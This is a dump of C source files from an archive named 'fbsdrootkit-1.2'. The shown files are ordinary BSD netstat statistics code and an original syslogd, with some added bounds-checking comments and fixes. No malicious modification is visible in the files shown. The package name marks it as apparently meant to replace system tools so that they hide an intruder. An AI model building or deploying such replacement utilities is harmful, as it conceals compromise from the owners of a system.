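	p(tcps_badsyn, "\t%ld bad connection attempt%s\n");
	p(tcps_listendrop, "\t%ld listen queue overflow%s\n");
	p(tcps_connects,
	    "\t%ld connection%s established (including accepts)\n");
	p2(tcps_closed, tcps_drops,
	    "\t%ld connection%s closed (including %ld drop%s)\n");
	p(tcps_cachedrtt,
	    "\t\t%ld connection%s updated cached RTT on close\n");
	p(tcps_cachedrttvar,
	    "\t\t%ld connection%s updated cached RTT variance on close\n");
	p(tcps_cachedssthresh,
	    "\t\t%ld connection%s updated cached ssthresh on close\n");
	p(tcps_conndrops, "\t%ld embryonic connection%s dropped\n");
	p2(tcps_rttupdated, tcps_segstimed,
	    "\t%ld segment%s updated rtt (of %ld attempt%s)\n");
	p(tcps_rexmttimeo, "\t%ld retransmit timeout%s\n");
	p(tcps_timeoutdrop,
	    "\t\t%ld connection%s dropped by rexmit timeout\n");
	p(tcps_persisttimeo, "\t%ld persist timeout%s\n");
	p(tcps_persistdrop,
	    "\t\t%ld connection%s dropped by persist timeout\n");
	p(tcps_keeptimeo, "\t%ld keepalive timeout%s\n");
	p(tcps_keepprobe, "\t\t%ld keepalive probe%s sent\n");
	p(tcps_keepdrops, "\t\t%ld connection%s dropped by keepalive\n");
	p(tcps_predack, "\t%ld correct ACK header prediction%s\n");
	p(tcps_preddat,
	    "\t%ld correct data packet header prediction%s\n");
#undef p
#undef p2
#undef p3
}

/*
 * Dump UDP statistics structure.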
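*/
/*
 * off:  kernel address of struct udpstat (0: print nothing).
 * name: heading printed before the counters.
 *
 * A counter is printed when it is non-zero or when sflag <= 1.
 * "delivered" is derived: received datagrams minus every drop counter.
 */
void
udp_stats(off, name)
	u_long off;
	char *name;
{
	struct udpstat udpstat;
	u_long delivered;

	if (off == 0)
		return;
	/* kread() has already warned; do not print an uninitialized struct */
	if (kread(off, (char *)&udpstat, sizeof (udpstat)))
		return;
	printf("%s:\n", name);

#define p(f, m) do { \
	if (udpstat.f || sflag <= 1) \
		printf(m, udpstat.f, plural(udpstat.f)); \
} while (0)

	p(udps_ipackets, "\t%lu datagram%s received\n");
	p(udps_hdrops, "\t%lu with incomplete header\n");
	p(udps_badlen, "\t%lu with bad data length field\n");
	p(udps_badsum, "\t%lu with bad checksum\n");
	p(udps_noport, "\t%lu dropped due to no socket\n");
	p(udps_noportbcast,
	    "\t%lu broadcast/multicast datagram%s dropped due to no socket\n");
	p(udps_fullsock, "\t%lu dropped due to full socket buffers\n");
	p(udpps_pcbhashmiss, "\t%lu not for hashed pcb\n");
	delivered = udpstat.udps_ipackets -
	    udpstat.udps_hdrops -
	    udpstat.udps_badlen -
	    udpstat.udps_badsum -
	    udpstat.udps_noport -
	    udpstat.udps_noportbcast -
	    udpstat.udps_fullsock;
	if (delivered || sflag <= 1)
		printf("\t%lu delivered\n", delivered);
	p(udps_opackets, "\t%lu datagram%s output\n");
#undef p
}

/*
 * Dump IP statistics structure.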
*/
/*
 * off  - address handed to kread(); 0 makes the function return at once.
 * name - heading printed before the counters.
 */
void
ip_stats(off, name)
	u_long off;
	char *name;
{
	struct ipstat ipstat;

	if (off == 0)
		return;
	kread(off, (char *)&ipstat, sizeof (ipstat));
	printf("%s:\n", name);

/*
 * Print one counter; a zero counter is shown only while sflag <= 1.
 * The macro expands to a bare `if`, so it must stay a full statement.
 */
#define	p(f, m) if (ipstat.f || sflag <= 1) \
    printf(m, ipstat.f, plural(ipstat.f))

	p(ips_total, "\t%lu total packet%s received\n");
	p(ips_badsum, "\t%lu bad header checksum%s\n");
	p(ips_toosmall, "\t%lu with size smaller than minimum\n");
	p(ips_tooshort, "\t%lu with data size < data length\n");
	p(ips_badhlen, "\t%lu with header length < data size\n");
	p(ips_badlen, "\t%lu with data length < header length\n");
	p(ips_badoptions, "\t%lu with bad options\n");
	p(ips_badvers, "\t%lu with incorrect version number\n");
	p(ips_fragments, "\t%lu fragment%s received\n");
	p(ips_fragdropped, "\t%lu fragment%s dropped (dup or out of space)\n");
	p(ips_fragtimeout, "\t%lu fragment%s dropped after timeout\n");
	p(ips_reassembled, "\t%lu packet%s reassembled ok\n");
	p(ips_delivered, "\t%lu packet%s for this host\n");
	p(ips_noproto, "\t%lu packet%s for unknown/unsupported protocol\n");
	p(ips_forward, "\t%lu packet%s forwarded\n");
	p(ips_cantforward, "\t%lu packet%s not forwardable\n");
	p(ips_redirectsent, "\t%lu redirect%s sent\n");
	p(ips_localout, "\t%lu packet%s sent from this host\n");
	p(ips_rawout, "\t%lu packet%s sent with fabricated ip header\n");
	p(ips_odropped, "\t%lu output packet%s dropped due to no bufs, etc.\n");
	p(ips_noroute, "\t%lu output packet%s discarded due to no route\n");
	p(ips_fragmented, "\t%lu output datagram%s fragmented\n");
	p(ips_ofragments, "\t%lu fragment%s created\n");
	p(ips_cantfrag, "\t%lu datagram%s that can't be fragmented\n");
#undef p
}

/*
 * Labels for the ICMP histograms, indexed by the loop counter in
 * icmp_stats().  The table holds 19 entries (indices 0..18).
 */
static	char *icmpnames[] = {
	"echo reply",
	"#1",
	"#2",
	"destination unreachable",
	"source quench",
	"routing redirect",
	"#6",
	"#7",
	"echo",
	"router advertisement",
	"router solicitation",
	"time exceeded",
	"parameter problem",
	"time stamp",
	"time stamp reply",
	"information request",
	"information request reply",
	"address mask request",
	"address mask reply",
};

/*
 * Dump ICMP statistics.
 *
 * off  - address handed to kread(); 0 makes the function return at once.
 * name - heading printed before the counters.
 */
void
icmp_stats(off, name)
	u_long off;
	char *name;
{
	struct icmpstat icmpstat;
	register int i, first;

	if (off == 0)
		return;
	kread(off, (char *)&icmpstat, sizeof (icmpstat));
	printf("%s:\n", name);

/* Print one counter; a zero counter is shown only while sflag <= 1. */
#define	p(f, m) if (icmpstat.f || sflag <= 1) \
    printf(m, icmpstat.f, plural(icmpstat.f))

	p(icps_error, "\t%lu call%s to icmp_error\n");
	p(icps_oldicmp,
	    "\t%lu error%s not generated 'cuz old message was icmp\n");
	/*
	 * Output histogram: the heading is printed lazily, before the first
	 * non-zero bucket.
	 * NOTE(review): icmpnames[i] is read for every i up to ICMP_MAXTYPE,
	 * so this assumes ICMP_MAXTYPE + 1 <= 19 table entries -- confirm
	 * against the header this file is built with.
	 */
	for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++)
		if (icmpstat.icps_outhist[i] != 0) {
			if (first) {
				printf("\tOutput histogram:\n");
				first = 0;
			}
			printf("\t\t%s: %lu\n", icmpnames[i],
				icmpstat.icps_outhist[i]);
		}
	p(icps_badcode, "\t%lu message%s with bad code fields\n");
	p(icps_tooshort, "\t%lu message%s < minimum length\n");
	p(icps_checksum, "\t%lu bad checksum%s\n");
	p(icps_badlen, "\t%lu message%s with bad length\n");
	/* Input histogram, same lazy heading and same table-size assumption. */
	for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++)
		if (icmpstat.icps_inhist[i] != 0) {
			if (first) {
				printf("\tInput histogram:\n");
				first = 0;
			}
			printf("\t\t%s: %lu\n", icmpnames[i],
				icmpstat.icps_inhist[i]);
		}
	p(icps_reflect, "\t%lu message response%s generated\n");
#undef p
}

/*
 * Dump IGMP statistics structure.
 *
 * off  - address handed to kread(); 0 makes the function return at once.
 * name - heading printed before the counters.
 */
void
igmp_stats(off, name)
	u_long off;
	char *name;
{
	struct igmpstat igmpstat;

	if (off == 0)
		return;
	kread(off, (char *)&igmpstat, sizeof (igmpstat));
	printf("%s:\n", name);

/* p() appends the plural() suffix; py() chooses between "y" and "ies". */
#define	p(f, m) if (igmpstat.f || sflag <= 1) \
    printf(m, igmpstat.f, plural(igmpstat.f))
#define	py(f, m) if (igmpstat.f || sflag <= 1) \
    printf(m, igmpstat.f, igmpstat.f != 1 ? "ies" : "y")
	p(igps_rcv_total, "\t%u message%s received\n");
	p(igps_rcv_tooshort, "\t%u message%s received with too few bytes\n");
	p(igps_rcv_badsum, "\t%u message%s received with bad checksum\n");
	py(igps_rcv_queries, "\t%u membership quer%s received\n");
	py(igps_rcv_badqueries, "\t%u membership quer%s received with invalid field(s)\n");
	p(igps_rcv_reports, "\t%u membership report%s received\n");
	p(igps_rcv_badreports, "\t%u membership report%s received with invalid field(s)\n");
	p(igps_rcv_ourreports, "\t%u membership report%s received for groups to which we belong\n");
	p(igps_snd_reports, "\t%u membership report%s sent\n");
#undef p
#undef py
}

/*
 * Pretty print an Internet address (net address + port).
 *
 * in      - address, rendered through inetname().
 * port    - port as passed to getservbyport() and ntohs(); 0 prints "*".
 * proto   - protocol name used for the service lookup.
 * numeric - non-zero skips the service-name lookup.
 */
void
inetprint(in, port, proto,numeric)
	register struct in_addr *in;
	int port;
	char *proto;
	int numeric;
{
	struct servent *sp = 0;
	char line[80], *cp;
	int width;

	/*
	 * Every write into line[] is length-limited by its format: at most
	 * 16 characters of host plus '.', then either "%.15s" or the decimal
	 * form of a 16-bit port, so the 80-byte buffer cannot be overrun here.
	 */
	sprintf(line, "%.*s.", (Aflag && !numeric) ? 12 : 16, inetname(in));
	cp = index(line, '\0');
	if (!numeric && port)
		sp = getservbyport((int)port, proto);
	if (sp || port == 0)
		sprintf(cp, "%.15s", sp ? sp->s_name : "*");
	else
		sprintf(cp, "%d", ntohs((u_short)port));
	/* Pad and truncate to the column width selected by Aflag. */
	width = Aflag ? 18 : 22;
	printf(" %-*.*s", width, width, line);
}

/*
 * Construct an Internet address representation.
 * If the nflag has been supplied, give
 * numeric value, otherwise try for symbolic name.
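*/
/*
 * inp - address to render, in network byte order.
 *
 * Returns a pointer to a static buffer that the next call overwrites.
 * The result is "*" for INADDR_ANY, a network or host name when nflag is
 * clear and a lookup succeeds, otherwise the dotted-quad form.
 *
 * NOTE(review): on the numeric path the caller's s_addr is converted to
 * host byte order in place, so a second call on the same structure sees
 * an already converted value.  Left as is because callers outside this
 * view may rely on it.
 */
char *
inetname(inp)
	struct in_addr *inp;
{
	register char *cp;
	static char line[50];
	struct hostent *hp;
	struct netent *np;

	cp = 0;
	if (!nflag && inp->s_addr != INADDR_ANY) {
		int net = inet_netof(*inp);
		int lna = inet_lnaof(*inp);

		/* A zero host part is treated as a network address first. */
		if (lna == INADDR_ANY) {
			np = getnetbyaddr(net, AF_INET);
			if (np)
				cp = np->n_name;
		}
		if (cp == 0) {
			hp = gethostbyaddr((char *)inp, sizeof (*inp), AF_INET);
			if (hp) {
				cp = hp->h_name;
				trimdomain(cp);
			}
		}
	}
	if (inp->s_addr == INADDR_ANY)
		strcpy(line, "*");
	else if (cp) {
		/*
		 * The name comes from a network/host database lookup and its
		 * length is not under this program's control, so the copy is
		 * bounded to the static buffer and always terminated.  The
		 * previous unbounded strcpy() could write past line[].
		 */
		strncpy(line, cp, sizeof(line) - 1);
		line[sizeof(line) - 1] = '\0';
	} else {
		inp->s_addr = ntohl(inp->s_addr);
#define C(x)	((x) & 0xff)
		/* Four octets of at most three digits each fit easily. */
		sprintf(line, "%lu.%lu.%lu.%lu", C(inp->s_addr >> 24),
		    C(inp->s_addr >> 16), C(inp->s_addr >> 8), C(inp->s_addr));
	}
	return (line);
}
fbsdrootkit-1.2/netstat/unix.c.dist100600 764 0 10243 6256130347 15245 0ustar dfroot/*- * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission.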
* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)unix.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * Display protocol blocks in the unix domain. */ #include #include #include #include #include #include #include #include #include #define KERNEL struct uio; struct proc; #include #include #include #include #include "netstat.h" static void unixdomainpr __P((struct socket *, caddr_t)); static struct file *file, *fileNFILE; static int nfiles; extern kvm_t *kvmd; void unixpr(off) u_long off; { register struct file *fp; struct socket sock, *so = &sock; char *filebuf; struct protosw *unixsw = (struct protosw *)off; filebuf = (char *)kvm_getfiles(kvmd, KERN_FILE, 0, &nfiles); if (filebuf == 0) { printf("Out of memory (file table).\n"); return; } file = (struct file *)(filebuf + sizeof(fp)); fileNFILE = file + nfiles; for (fp = file; fp < fileNFILE; fp++) { if (fp->f_count == 0 || fp->f_type != DTYPE_SOCKET) continue; if (kread((u_long)fp->f_data, (char *)so, sizeof (*so))) continue; /* kludge */ if (so->so_proto >= unixsw && so->so_proto <= unixsw + 2) if (so->so_pcb) unixdomainpr(so, fp->f_data); } } static char *socktype[] = { "#0", "stream", "dgram", "raw", "rdm", "seqpacket" }; static void unixdomainpr(so, soaddr) 
register struct socket *so; caddr_t soaddr; { struct unpcb unpcb, *unp = &unpcb; struct mbuf mbuf, *m; struct sockaddr_un *sa; static int first = 1; if (kread((u_long)so->so_pcb, (char *)unp, sizeof (*unp))) return; if (unp->unp_addr) { m = &mbuf; if (kread((u_long)unp->unp_addr, (char *)m, sizeof (*m))) m = (struct mbuf *)0; sa = (struct sockaddr_un *)(m->m_dat); } else m = (struct mbuf *)0; if (first) { printf("Active UNIX domain sockets\n"); printf( "%-8.8s %-6.6s %-6.6s %-6.6s %8.8s %8.8s %8.8s %8.8s Addr\n", "Address", "Type", "Recv-Q", "Send-Q", "Inode", "Conn", "Refs", "Nextref"); first = 0; } printf("%8x %-6.6s %6d %6d %8x %8x %8x %8x", soaddr, socktype[so->so_type], so->so_rcv.sb_cc, so->so_snd.sb_cc, unp->unp_vnode, unp->unp_conn, unp->unp_refs, unp->unp_nextref); if (m) printf(" %.*s", m->m_len - (int)(sizeof(*sa) - sizeof(sa->sun_path)), sa->sun_path); putchar('\n'); } fbsdrootkit-1.2/netstat/Makefile.dist100600 764 0 412 6257642722 15521 0ustar dfroot# @(#)Makefile 8.1 (Berkeley) 6/12/93 PROG= netstat SRCS= if.c inet.c iso.c main.c mbuf.c mroute.c ns.c route.c \ tp_astring.c unix.c CFLAGS+=-I/sys .PATH: ${.CURDIR}/../../sys/netiso BINGRP= kmem BINMODE=2555 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/syslogd/ 40700 764 764 0 6256606643 12535 5ustar dfdffbsdrootkit-1.2/syslogd/Makefile100600 764 764 256 5620352540 14243 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= syslogd SRCS= syslogd.c ttymsg.c .PATH: ${.CURDIR}/../../usr.bin/wall MAN5= syslog.conf.5 MAN8= syslogd.8 .include fbsdrootkit-1.2/syslogd/pathnames.h100600 764 764 3733 5571035340 14760 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. 
* 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #define _PATH_KLOG "/dev/klog" #define _PATH_LOGCONF "/etc/syslog.conf" #define _PATH_LOGPID "/var/run/syslog.pid" fbsdrootkit-1.2/syslogd/syslogd.c.dist100600 764 764 65734 6256132531 15453 0ustar dfdf/* * Copyright (c) 1983, 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)syslogd.c 8.3 (Berkeley) 4/4/94"; #endif /* not lint */ /* * syslogd -- log system messages * * This program implements a system log. It takes a series of lines. * Each line may have a priority, signified as "" as * the first characters of the line. 
If this is * not present, a default priority is used. * * To kill syslogd, send a signal 15 (terminate). A signal 1 (hup) will * cause it to reread its configuration file. * * Defined Constants: * * MAXLINE -- the maximimum line length that can be handled. * DEFUPRI -- the default priority for user messages * DEFSPRI -- the default priority for kernel messages * * Author: Eric Allman * extensive changes by Ralph Campbell * more extensive changes by Eric Allman (again) * Extension to log by program name as well as facility and priority * by Peter da Silva. */ #define MAXLINE 1024 /* maximum line length */ #define MAXSVLINE 120 /* maximum saved line length */ #define DEFUPRI (LOG_USER|LOG_NOTICE) #define DEFSPRI (LOG_KERN|LOG_CRIT) #define TIMERINTVL 30 /* interval for checking flush, mark */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" #define SYSLOG_NAMES #include char *LogName = _PATH_LOG; char *ConfFile = _PATH_LOGCONF; char *PidFile = _PATH_LOGPID; char ctty[] = _PATH_CONSOLE; #define FDMASK(fd) (1 << (fd)) #define dprintf if (Debug) printf #define MAXUNAMES 20 /* maximum number of user names */ /* * Flags to logmsg(). */ #define IGN_CONS 0x001 /* don't print on console */ #define SYNC_FILE 0x002 /* do fsync on file after printing */ #define ADDDATE 0x004 /* add a date to the message */ #define MARK 0x008 /* this message is a mark */ /* * This structure represents the files that will have log * copies printed. 
*/ struct filed { struct filed *f_next; /* next in linked list */ short f_type; /* entry type, see below */ short f_file; /* file descriptor */ time_t f_time; /* time this was last written */ u_char f_pmask[LOG_NFACILITIES+1]; /* priority mask */ char *f_program; /* program this applies to */ union { char f_uname[MAXUNAMES][UT_NAMESIZE+1]; struct { char f_hname[MAXHOSTNAMELEN+1]; struct sockaddr_in f_addr; } f_forw; /* forwarding address */ char f_fname[MAXPATHLEN]; } f_un; char f_prevline[MAXSVLINE]; /* last message logged */ char f_lasttime[16]; /* time of last occurrence */ char f_prevhost[MAXHOSTNAMELEN+1]; /* host from which recd. */ int f_prevpri; /* pri of f_prevline */ int f_prevlen; /* length of f_prevline */ int f_prevcount; /* repetition cnt of prevline */ int f_repeatcount; /* number of "repeated" msgs */ }; /* * Intervals at which we flush out "message repeated" messages, * in seconds after previous message is logged. After each flush, * we move to the next interval until we reach the largest. 
*/ int repeatinterval[] = { 30, 120, 600 }; /* # of secs before flush */ #define MAXREPEAT ((sizeof(repeatinterval) / sizeof(repeatinterval[0])) - 1) #define REPEATTIME(f) ((f)->f_time + repeatinterval[(f)->f_repeatcount]) #define BACKOFF(f) { if (++(f)->f_repeatcount > MAXREPEAT) \ (f)->f_repeatcount = MAXREPEAT; \ } /* values for f_type */ #define F_UNUSED 0 /* unused entry */ #define F_FILE 1 /* regular file */ #define F_TTY 2 /* terminal */ #define F_CONSOLE 3 /* console terminal */ #define F_FORW 4 /* remote machine */ #define F_USERS 5 /* list of users */ #define F_WALL 6 /* everyone logged on */ char *TypeNames[7] = { "UNUSED", "FILE", "TTY", "CONSOLE", "FORW", "USERS", "WALL" }; struct filed *Files; struct filed consfile; int Debug; /* debug flag */ char LocalHostName[MAXHOSTNAMELEN+1]; /* our hostname */ char *LocalDomain; /* our local domain name */ int InetInuse = 0; /* non-zero if INET sockets are being used */ int finet; /* Internet datagram socket */ int LogPort; /* port number for INET connections */ int Initialized = 0; /* set when we have initialized ourselves */ int MarkInterval = 20 * 60; /* interval between marks in seconds */ int MarkSeq = 0; /* mark sequence number */ void cfline __P((char *, struct filed *, char *)); char *cvthname __P((struct sockaddr_in *)); int decode __P((const char *, CODE *)); void die __P((int)); void domark __P((int)); void fprintlog __P((struct filed *, int, char *)); void init __P((int)); void logerror __P((char *)); void logmsg __P((int, char *, char *, int)); void printline __P((char *, char *)); void printsys __P((char *)); void reapchild __P((int)); char *ttymsg __P((struct iovec *, int, char *, int)); void usage __P((void)); void wallmsg __P((struct filed *, struct iovec *)); int main(argc, argv) int argc; char *argv[]; { int ch, funix, i, inetm, fklog, klogm, len; struct sockaddr_un sunx, fromunix; struct sockaddr_in sin, frominet; FILE *fp; char *p, line[MSG_BSIZE + 1]; while ((ch = getopt(argc, argv, 
"df:m:p:")) != EOF) switch(ch) { case 'd': /* debug */ Debug++; break; case 'f': /* configuration file */ ConfFile = optarg; break; case 'm': /* mark interval */ MarkInterval = atoi(optarg) * 60; break; case 'p': /* path */ LogName = optarg; break; case '?': default: usage(); } if ((argc -= optind) != 0) usage(); if (!Debug) (void)daemon(0, 0); else setlinebuf(stdout); consfile.f_type = F_CONSOLE; (void)strcpy(consfile.f_un.f_fname, ctty); (void)gethostname(LocalHostName, sizeof(LocalHostName)); if ((p = strchr(LocalHostName, '.')) != NULL) { *p++ = '\0'; LocalDomain = p; } else LocalDomain = ""; (void)signal(SIGTERM, die); (void)signal(SIGINT, Debug ? die : SIG_IGN); (void)signal(SIGQUIT, Debug ? die : SIG_IGN); (void)signal(SIGCHLD, reapchild); (void)signal(SIGALRM, domark); (void)alarm(TIMERINTVL); (void)unlink(LogName); #ifndef SUN_LEN #define SUN_LEN(unp) (strlen((unp)->sun_path) + 2) #endif memset(&sunx, 0, sizeof(sunx)); sunx.sun_family = AF_UNIX; (void)strncpy(sunx.sun_path, LogName, sizeof(sunx.sun_path)); funix = socket(AF_UNIX, SOCK_DGRAM, 0); if (funix < 0 || bind(funix, (struct sockaddr *)&sunx, SUN_LEN(&sunx)) < 0 || chmod(LogName, 0666) < 0) { (void) sprintf(line, "cannot create %s", LogName); logerror(line); dprintf("cannot create %s (%d)\n", LogName, errno); die(0); } finet = socket(AF_INET, SOCK_DGRAM, 0); inetm = 0; if (finet >= 0) { struct servent *sp; sp = getservbyname("syslog", "udp"); if (sp == NULL) { errno = 0; logerror("syslog/udp: unknown service"); die(0); } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = LogPort = sp->s_port; if (bind(finet, (struct sockaddr *)&sin, sizeof(sin)) < 0) { logerror("bind"); if (!Debug) die(0); } else { inetm = FDMASK(finet); InetInuse = 1; } } if ((fklog = open(_PATH_KLOG, O_RDONLY, 0)) >= 0) klogm = FDMASK(fklog); else { dprintf("can't open %s (%d)\n", _PATH_KLOG, errno); klogm = 0; } /* tuck my process id away */ fp = fopen(PidFile, "w"); if (fp != NULL) { fprintf(fp, "%d\n", 
getpid()); (void) fclose(fp); } dprintf("off & running....\n"); init(0); (void)signal(SIGHUP, init); for (;;) { int nfds, readfds = FDMASK(funix) | inetm | klogm; dprintf("readfds = %#x\n", readfds); nfds = select(20, (fd_set *)&readfds, (fd_set *)NULL, (fd_set *)NULL, (struct timeval *)NULL); if (nfds == 0) continue; if (nfds < 0) { if (errno != EINTR) logerror("select"); continue; } dprintf("got a message (%d, %#x)\n", nfds, readfds); if (readfds & klogm) { i = read(fklog, line, sizeof(line) - 1); if (i > 0) { line[i] = '\0'; printsys(line); } else if (i < 0 && errno != EINTR) { logerror("klog"); fklog = -1; klogm = 0; } } if (readfds & FDMASK(funix)) { len = sizeof(fromunix); i = recvfrom(funix, line, MAXLINE, 0, (struct sockaddr *)&fromunix, &len); if (i > 0) { line[i] = '\0'; printline(LocalHostName, line); } else if (i < 0 && errno != EINTR) logerror("recvfrom unix"); } if (readfds & inetm) { len = sizeof(frominet); i = recvfrom(finet, line, MAXLINE, 0, (struct sockaddr *)&frominet, &len); if (i > 0) { line[i] = '\0'; printline(cvthname(&frominet), line); } else if (i < 0 && errno != EINTR) logerror("recvfrom inet"); } } } void usage() { (void)fprintf(stderr, "usage: syslogd [-f conffile] [-m markinterval] [-p logpath]\n"); exit(1); } /* * Take a raw input line, decode the message, and print the message * on the appropriate log files. 
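*/
/*
 * hname - name of the sending host, passed through to logmsg().
 * msg   - NUL-terminated raw line; may start with "<pri>".
 *
 * The line arrives from the local socket or from the network, so every
 * byte is treated as untrusted: the priority is range-checked, the kernel
 * facility is remapped, and control characters are made printable.
 */
void
printline(hname, msg)
	char *hname;
	char *msg;
{
	int c, pri;
	char *p, *q, *end, line[MAXLINE + 1];

	/* test for special codes */
	pri = DEFUPRI;
	p = msg;
	if (*p == '<') {
		pri = 0;
		/*
		 * Stop accumulating once the value is already out of range,
		 * so an arbitrarily long digit run cannot overflow the int.
		 * The cast keeps isdigit() defined for bytes >= 0x80.
		 */
		while (isdigit((unsigned char)*++p))
			if (pri <= (LOG_FACMASK|LOG_PRIMASK))
				pri = 10 * pri + (*p - '0');
		if (*p == '>')
			++p;
	}
	if (pri > (LOG_FACMASK|LOG_PRIMASK) ||
	    (pri &~ (LOG_FACMASK|LOG_PRIMASK)))
		pri = DEFUPRI;

	/* don't allow users to log kernel messages */
	if (LOG_FAC(pri) == LOG_KERN)
		pri = LOG_MAKEPRI(LOG_USER, LOG_PRI(pri));

	q = line;
	end = &line[sizeof(line) - 1];	/* slot reserved for the NUL */

	while ((c = *p++ & 0177) != '\0' && q < end) {
		if (!iscntrl(c))
			*q++ = c;
		else if (c == '\n')
			*q++ = ' ';
		else if (c == '\t')
			*q++ = '\t';
		else {
			/*
			 * The "^X" form needs two bytes.  The old loop only
			 * checked for one, so a control character in the last
			 * free slot pushed the terminator one byte past
			 * line[].
			 */
			if (end - q < 2)
				break;
			*q++ = '^';
			*q++ = c ^ 0100;
		}
	}
	*q = '\0';

	logmsg(pri, line, hname, 0);
}

/*
 * Take a raw input line from /dev/klog, split and format similar to syslog().
 *
 * msg - NUL-terminated buffer holding one or more '\n'-separated records.
 * Each record is prefixed with "<bootfile>: " and logged separately.
 */
void
printsys(msg)
	char *msg;
{
	int c, pri, flags;
	char *lp, *p, *q, line[MAXLINE + 1];

	/* Bounded so that an unexpectedly long boot file name cannot overrun. */
	(void)snprintf(line, sizeof(line), "%s: ", getbootfile());
	lp = line + strlen(line);
	for (p = msg; *p != '\0'; ) {
		flags = SYNC_FILE | ADDDATE;	/* fsync file after write */
		pri = DEFSPRI;
		if (*p == '<') {
			pri = 0;
			/* Same overflow guard as in printline(). */
			while (isdigit((unsigned char)*++p))
				if (pri <= (LOG_FACMASK|LOG_PRIMASK))
					pri = 10 * pri + (*p - '0');
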